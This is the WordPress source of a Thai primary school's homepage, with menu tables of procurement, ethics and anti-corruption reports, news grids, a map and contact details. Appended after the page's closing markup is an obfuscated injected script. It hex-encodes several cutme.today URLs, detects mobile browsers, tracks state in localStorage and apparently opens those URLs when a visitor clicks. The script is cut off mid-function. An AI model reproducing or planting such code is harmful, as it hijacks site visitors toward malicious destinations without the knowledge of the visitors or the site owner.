{\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#32e6a4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const 